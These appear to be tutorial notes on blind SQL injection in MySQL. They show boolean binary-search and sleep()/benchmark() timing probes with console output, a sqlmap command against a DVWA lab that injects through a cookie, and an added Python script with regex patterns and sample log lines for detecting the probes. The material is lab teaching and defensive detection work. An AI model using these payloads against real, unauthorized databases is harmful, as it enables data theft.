Blind injection arises when the result of the database query is not displayed directly on the page. Information can only be inferred by constructing query statements and observing whether the feedback indicates a true or a false condition.
The actual injection technique differs little from injection with visible output.
Only the relevant approach is recorded below.
select length('test');  returns the length of a string
Use binary search to determine the length of the database name:
mysql> select length(database())>10;
+-----------------------+
| length(database())>10 |
+-----------------------+
| 0 |
+-----------------------+
1 row in set (0.00 sec)
mysql> select length(database())>5;
+----------------------+
| length(database())>5 |
+----------------------+
| 0 |
+----------------------+
1 row in set (0.00 sec)
mysql> select length(database())>3;
+----------------------+
| length(database())>3 |
+----------------------+
| 1 |
+----------------------+
1 row in set (0.00 sec)
mysql> select length(database())=4;
+----------------------+
| length(database())=4 |
+----------------------+
| 1 |
+----------------------+
1 row in set (0.00 sec)
mysql> select substr(database(),1,1);
+------------------------+
| substr(database(),1,1) |
+------------------------+
| d |
+------------------------+
1 row in set (0.00 sec)
mysql> select ascii(substr(database(),1,1))>64;
+----------------------------------+
| ascii(substr(database(),1,1))>64 |
+----------------------------------+
| 1 |
+----------------------------------+
1 row in set (0.00 sec)
mysql> select ascii(substr(database(),1,1))>100;
+-----------------------------------+
| ascii(substr(database(),1,1))>100 |
+-----------------------------------+
| 0 |
+-----------------------------------+
1 row in set (0.00 sec)
mysql> select ascii(substr(database(),1,1))>80;
+----------------------------------+
| ascii(substr(database(),1,1))>80 |
+----------------------------------+
| 1 |
+----------------------------------+
1 row in set (0.00 sec)
mysql> select ascii(substr(database(),1,1))>90;
+----------------------------------+
| ascii(substr(database(),1,1))>90 |
+----------------------------------+
| 1 |
+----------------------------------+
1 row in set (0.00 sec)
mysql> select ascii(substr(database(),1,1))>95;
+----------------------------------+
| ascii(substr(database(),1,1))>95 |
+----------------------------------+
| 1 |
+----------------------------------+
1 row in set (0.00 sec)
mysql> select ascii(substr(database(),1,1))>97;
+----------------------------------+
| ascii(substr(database(),1,1))>97 |
+----------------------------------+
| 1 |
+----------------------------------+
1 row in set (0.00 sec)
mysql> select ascii(substr(database(),1,1))>98;
+----------------------------------+
| ascii(substr(database(),1,1))>98 |
+----------------------------------+
| 1 |
+----------------------------------+
1 row in set (0.00 sec)
mysql> select ascii(substr(database(),1,1))>99;
+----------------------------------+
| ascii(substr(database(),1,1))>99 |
+----------------------------------+
| 1 |
+----------------------------------+
1 row in set (0.00 sec)
mysql> select ascii(substr(database(),1,1))=100;
+-----------------------------------+
| ascii(substr(database(),1,1))=100 |
+-----------------------------------+
| 1 |
+-----------------------------------+
1 row in set (0.00 sec)
Binary search shows that the first character of the database name has ASCII code 100, which is lowercase d.
Blind injection can also be judged by a time delay:
mysql> select sleep(if(length(database())=4,3,0));
+-------------------------------------+
| sleep(if(length(database())=4,3,0)) |
+-------------------------------------+
| 0 |
+-------------------------------------+
1 row in set (3.00 sec)
mysql> select sleep(if(length(database())=5,3,0));
+-------------------------------------+
| sleep(if(length(database())=5,3,0)) |
+-------------------------------------+
| 0 |
+-------------------------------------+
1 row in set (0.00 sec)
Whether the guess is correct is judged from the delay in the response.
benchmark, which executes a function repeatedly, can also be used to produce the delay:
mysql> select benchmark(50000,md5('test'));
+------------------------------+
| benchmark(50000,md5('test')) |
+------------------------------+
| 0 |
+------------------------------+
1 row in set (0.02 sec)
mysql> select benchmark(5000000,md5('test'));
+--------------------------------+
| benchmark(5000000,md5('test')) |
+--------------------------------+
| 0 |
+--------------------------------+
1 row in set (1.45 sec)
DVWA, high difficulty
python sqlmap.py -u "http://192.168.3.88/dvwa/vulnerabilities/sqli_blind/" -p "id" --cookie "PHPSESSID=dv9h9urfu9bf9udkd7ih6qdbj3;id=1;security=high" --level 2
The injectable field is inside the cookie, so --level 2 must be set.
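As an added defender's example (not part of these notes), the following Python scans constructed web-server log lines for the probe shapes recorded above: the binary-search comparisons on ascii(substr(...)) and length(...), and the sleep()/benchmark() delays. A client is flagged once it repeats boolean probes, which is the footprint of the binary search. The log format, client IPs, alert threshold and sample lines are assumptions; on DVWA high the injected field travels in the cookie, so the logged field would be the cookie value rather than the query string.

```python
import re
from urllib.parse import unquote_plus

# Signatures of the probes recorded in the notes above: a numeric comparison against
# ascii(substr(...)) or length(...), and the sleep()/benchmark() calls used for timing.
BOOLEAN_PROBE = re.compile(
    r"\b(?:ascii\s*\(\s*(?:substr|substring|mid)\s*\(.*?\)\s*\)|length\s*\(.*?\))"
    r"\s*(?:[<>]=?|=)\s*\d+",
    re.IGNORECASE,
)
TIME_PROBE = re.compile(r"\b(?:sleep|benchmark)\s*\(", re.IGNORECASE)

# Constructed sample log, one "client_ip request" per line (assumed format). 10.0.0.5 mimics
# the binary-search probes above (one line still URL-encoded), 10.0.0.9 sends the sleep()
# probe, and 10.0.0.7 is ordinary traffic.
SAMPLE_LOG = """\
10.0.0.5 /dvwa/vulnerabilities/sqli_blind/?id=1 AND length(database())>5
10.0.0.5 /dvwa/vulnerabilities/sqli_blind/?id=1 AND ascii(substr(database(),1,1))>64
10.0.0.5 /dvwa/vulnerabilities/sqli_blind/?id=1+AND+ascii%28substr%28database%28%29%2C1%2C1%29%29%3E100
10.0.0.5 /dvwa/vulnerabilities/sqli_blind/?id=1 AND ascii(substr(database(),1,1))=100
10.0.0.9 /dvwa/vulnerabilities/sqli_blind/?id=1 AND sleep(if(length(database())=4,3,0))
10.0.0.7 /dvwa/vulnerabilities/sqli_blind/?id=2
10.0.0.7 /dvwa/index.php
"""


def classify_request(raw_request: str) -> set:
    """Return the probe types ("boolean", "time") found in one logged request field."""
    text = unquote_plus(raw_request)  # decode %xx and '+' before matching
    tags = set()
    if BOOLEAN_PROBE.search(text):
        tags.add("boolean")
    if TIME_PROBE.search(text):
        tags.add("time")
    return tags


def scan_log(log_text: str, threshold: int = 3) -> dict:
    """Count probes per client IP. A client is flagged once it has sent `threshold`
    boolean probes (the footprint of the binary search above) or any time probe."""
    per_ip = {}
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ip, _, request = line.partition(" ")
        stats = per_ip.setdefault(ip, {"boolean": 0, "time": 0, "alert": False})
        for tag in classify_request(request):
            stats[tag] += 1
        stats["alert"] = stats["boolean"] >= threshold or stats["time"] > 0
    return per_ip
```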